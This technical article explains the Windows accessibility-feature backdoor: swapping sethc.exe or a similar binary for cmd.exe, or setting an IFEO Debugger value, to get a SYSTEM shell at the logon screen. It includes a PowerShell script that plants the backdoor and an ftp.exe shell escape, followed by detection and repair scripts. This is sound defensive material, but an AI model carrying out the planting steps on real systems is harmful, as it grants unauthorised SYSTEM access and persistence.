Accessibility Features on Windows can be abused as a privilege escalation or persistence mechanism. The persistence works by swapping one of the binaries behind an Accessibility Feature for cmd.exe, or whatever malware you choose. Once the binary is replaced, pressing the key sequence that triggers the feature at the logon screen yields code execution as SYSTEM, because the logon screen launches these helpers in the SYSTEM context before anyone has authenticated.
An example is replacing sethc.exe (Sticky Keys) with cmd.exe. At the logon screen, pressing Shift five times then spawns cmd.exe as SYSTEM.
This technique also works over RDP, since the key sequence reaches the remote logon screen, unless Network Level Authentication is enforced and credentials are required before that screen is shown. It is a popular backup persistence method, used in CTFs and by many threat actors, because it is trivial to set up.
The same trick is also used legitimately to recover lost passwords. With physical access to the system, boot an OS from USB, mount the computer's system disk, and make the required file swap; this only works if the disk is not encrypted or can be unlocked. After rebooting, trigger the backdoor to get a shell as SYSTEM and use net.exe (net user <username> <newpassword>) to set a new password for the user.
| Feature | Binary (in %SystemRoot%\System32) | Key sequence at the logon screen |
|---|---|---|
| Sticky Keys | sethc.exe | Shift 5 times |
| On-Screen Keyboard | osk.exe | Windows + Control + O |
| Utility Manager | utilman.exe | Windows + U |
| Display Switcher | DisplaySwitch.exe | Windows + P |
| App Switcher | AtBroker.exe | Alt + Tab |
| Magnifier | Magnify.exe | Windows + Plus (+) |
| Narrator | Narrator.exe | Windows + Control + Enter |
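The file swap described above, done on a live system from an elevated PowerShell session. This is an added example and not code from the original article; the backup filename (sethc.exe.old) is an assumption chosen so that the later section on .old files has something to find. The offline variant (booting from USB and mounting the disk) is the same copy without the ownership steps, because a mounted offline volume is not protected by the running OS.

```powershell
# Added example (not from the original article): plant the Sticky Keys backdoor on a
# live system. Requires an elevated session. The backup name below is an assumption.
$target  = "$env:SystemRoot\System32\sethc.exe"
$payload = "$env:SystemRoot\System32\cmd.exe"
$backup  = "$target.old"   # assumed backup name; this is the kind of .old file a responder should look for

# System32 binaries are owned by TrustedInstaller, so even an administrator must take
# ownership and grant themselves write access before the file can be overwritten.
# The SID form (*S-1-5-32-544 = BUILTIN\Administrators) avoids localized group names.
takeown.exe /F $target | Out-Null
icacls.exe $target /grant "*S-1-5-32-544:F" | Out-Null

# Keep the original so the change can be reverted, then drop cmd.exe in its place.
Copy-Item -Path $target -Destination $backup -Force
Copy-Item -Path $payload -Destination $target -Force

# Both files now carry the same SHA-256, which is exactly what the naive hash check
# in the detection section looks for.
Get-FileHash -Algorithm SHA256 -Path $target, $payload | Format-Table Hash, Path -AutoSize
```

After this, pressing Shift five times at the logon screen launches the copied cmd.exe as SYSTEM. Note that the takeown/icacls steps change the owner and ACL of sethc.exe, which is itself a useful forensic indicator: a genuine sethc.exe is owned by NT SERVICE\TrustedInstaller.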
Image File Execution Options
Alternatively, Image File Execution Options (IFEO) can be abused to get the same behavior without modifying the binary on disk. When a program named in an IFEO key has a Debugger value, the loader starts that "debugger" instead, passing the original command line to it.
For example, adding a Debugger value containing cmd.exe under sethc.exe's key at
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe will also spawn
cmd.exe as SYSTEM when you press Shift five times on the logon screen. Because sethc.exe itself is untouched, comparing file hashes will not reveal this variant; the registry key has to be checked as well.
An easy way to determine whether this technique has been used on a system is to compare the hashes of the accessibility executables with those of known-good copies from the same Windows build.
Another quick check is to look up each program's hash on VirusTotal, which lists the filenames it has seen for that hash. If the names associated with the hash (for example cmd.exe) don't match the filename on disk (for example sethc.exe), the file has probably been altered.
Some tools check for this technique by matching each accessibility tool against the hashes of cmd.exe and
powershell.exe. If any of them are equal to cmd or powershell, this backdoor is likely present.
This is not a sufficient check, because other LOLBAS utilities such as
ftp.exe can be used as an interactive shell instead of cmd.exe. Its `!` prefix runs the rest of the line through the command interpreter:

```
C:\Users\Daniel>ftp
ftp> !whoami
domain\daniel
ftp> !dir C:\
 Volume in drive C is Windows
 Volume Serial Number is PP5-1-D00D00

 Directory of C:\

09/05/2021  01:39 PM    <DIR>          Program Files
08/31/2021  05:15 PM    <DIR>          Program Files (x86)
08/31/2021  05:17 PM    <DIR>          Tools
08/17/2021  06:31 PM    <DIR>          Users
08/26/2021  06:31 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  786,584,748,032 bytes free
```
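An audit that covers both the file-swap variant and the IFEO variant, as an added example (not code from the original article or from any tool it mentions). It performs the cmd.exe/powershell.exe hash comparison the text describes, then adds the checks that catch a swapped-in ftp.exe or an IFEO Debugger value: Authenticode/catalog signature status, the embedded OriginalFilename of the binary, a leftover .old backup next to it, and the Debugger value under its Image File Execution Options key. The list of binaries comes from the table above; the .old naming is an assumption.

```powershell
# Added example (not from the original article): audit the accessibility binaries
# from the table and their IFEO keys. Read-only; no elevation required.
$accessibilityBinaries = 'sethc.exe','osk.exe','utilman.exe','DisplaySwitch.exe','AtBroker.exe','Magnify.exe','Narrator.exe'
$system32 = "$env:SystemRoot\System32"
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Hashes of the usual payloads, for the naive comparison the text warns is insufficient.
$knownShells = 'cmd.exe','powershell.exe' | ForEach-Object {
    (Get-FileHash -Algorithm SHA256 -Path (Join-Path $system32 $_)).Hash
}

foreach ($name in $accessibilityBinaries) {
    $path     = Join-Path $system32 $name
    $baseName = [IO.Path]::GetFileNameWithoutExtension($name)
    $findings = @()

    if (Test-Path $path) {
        $hash = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
        if ($knownShells -contains $hash) { $findings += 'hash matches cmd.exe/powershell.exe' }

        # Genuine accessibility binaries are Microsoft catalog-signed, but so are cmd.exe
        # and ftp.exe. The embedded OriginalFilename names the binary the file was built
        # as, regardless of the name it now sits under. It is a heuristic: custom malware
        # can carry any version resource it likes, so a clean match is not proof.
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') { $findings += "signature status $($sig.Status)" }
        $originalName = (Get-Item $path).VersionInfo.OriginalFilename
        if ($originalName -and $originalName -notlike "$baseName*") {
            $findings += "OriginalFilename is '$originalName'"
        }

        # A backup left behind by the swap (assumed naming: <binary>.old).
        if (Test-Path "$path.old") { $findings += "backup copy $name.old present" }
    } else {
        $findings += 'file missing'
    }

    # The IFEO variant leaves the binary intact, so it is only visible in the registry.
    $ifeoKey  = Join-Path $ifeoRoot $name
    $debugger = (Get-ItemProperty -Path $ifeoKey -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($debugger) { $findings += "IFEO Debugger = '$debugger'" }

    [pscustomobject]@{
        Binary   = $name
        Status   = if ($findings) { 'SUSPICIOUS' } else { 'ok' }
        Findings = $findings -join '; '
    }
}
```

On a clean system every row reports ok. A sethc.exe replaced with ftp.exe passes the hash comparison but fails the OriginalFilename check, and an IFEO backdoor passes every file check and is reported only by the Debugger finding. Comparing hashes against known-good copies of the same build, as the text recommends, remains the strongest file-level check and can be added as a lookup table next to $knownShells.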
Repairing Affected Systems
One way to repair a swapped binary is the System File Checker, which compares the file against the protected copy in the component store. Run against an unaltered file, sfc.exe reports no violations:

```
PS C:\Windows\system32> sfc /scanfile=C:\windows\system32\sethc.exe

Windows Resource Protection did not find any integrity violations.
```

Run against a replaced sethc.exe, sfc.exe detects the change and repairs it:

```
PS C:\Windows\system32> sfc /scanfile=C:\windows\system32\sethc.exe

Windows Resource Protection found corrupt files and successfully repaired them.
For online repairs, details are included in the CBS log file located at
windir\Logs\CBS\CBS.log. For example C:\Windows\Logs\CBS\CBS.log. For offline
repairs, details are included in the log file provided by the /OFFLOGFILE flag.

The system file repair changes will take effect after the next reboot.
```

sfc.exe only verifies the file on disk. It does nothing about the IFEO variant, where sethc.exe is intact and the Debugger value under the Image File Execution Options key has to be removed separately.
If sfc.exe cannot repair the file, another trick is to look next to the accessibility binaries for files with a
.old extension, which are often left behind as backups when the original was swapped out. Check the backup's signature and version information before copying it back, since an attacker can plant a .old file just as easily as the backdoor itself.
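The repair steps above combined into one pass, as an added example (not code from the original article): remove any IFEO Debugger value, let sfc.exe restore a swapped binary, and fall back to a .old backup only if it is validly signed and its OriginalFilename matches. The binary list is from the table earlier on the page; the <binary>.old naming is an assumption.

```powershell
# Added example (not from the original article): revert both variants of the backdoor.
# Run from an elevated session. sfc.exe only checks the file, so the IFEO Debugger value
# is handled here explicitly. The .old backup name is an assumption.
$accessibilityBinaries = 'sethc.exe','osk.exe','utilman.exe','DisplaySwitch.exe','AtBroker.exe','Magnify.exe','Narrator.exe'
$system32 = "$env:SystemRoot\System32"
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

foreach ($name in $accessibilityBinaries) {
    $path     = Join-Path $system32 $name
    $baseName = [IO.Path]::GetFileNameWithoutExtension($name)
    $ifeoKey  = Join-Path $ifeoRoot $name

    # 1. Remove only the Debugger value. Other values under the same IFEO key (for example
    #    mitigation settings) can be legitimate, so the key itself is left in place.
    $debugger = Get-ItemProperty -Path $ifeoKey -Name Debugger -ErrorAction SilentlyContinue
    if ($debugger) {
        Remove-ItemProperty -Path $ifeoKey -Name Debugger
        "$name : removed IFEO Debugger value '$($debugger.Debugger)'"
    }

    if (-not (Test-Path $path)) { "$name : missing, run sfc /scannow"; continue }

    # 2. Let Windows Resource Protection restore the file from the component store.
    #    If the store is damaged too, run 'DISM /Online /Cleanup-Image /RestoreHealth' first.
    sfc.exe /scanfile=$path | Out-Null

    # 3. If the file still does not verify, fall back to a leftover backup, but only one
    #    that is validly signed and was built under the expected name, so that a planted
    #    .old file is never copied into place. Copy-Item needs write access to $path, which
    #    a swapped file granted to Administrators already has.
    if ((Get-AuthenticodeSignature -FilePath $path).Status -ne 'Valid') {
        $backup = "$path.old"
        if (Test-Path $backup) {
            $backupSig  = Get-AuthenticodeSignature -FilePath $backup
            $backupName = (Get-Item $backup).VersionInfo.OriginalFilename
            if ($backupSig.Status -eq 'Valid' -and $backupName -like "$baseName*") {
                Copy-Item -Path $backup -Destination $path -Force
                "$name : restored from $backup"
            } else {
                "$name : backup $backup present but NOT trusted (status $($backupSig.Status), OriginalFilename '$backupName')"
            }
        } else {
            "$name : still invalid and no backup found, reinstall from installation media"
        }
    } else {
        "$name : verified"
    }
}
```

After the pass, re-run the audit from the detection section: every binary should verify, no .old copies should remain once you have removed them, and no IFEO key should carry a Debugger value. As the sfc output notes, a file repaired online may only be fully in effect after the next reboot.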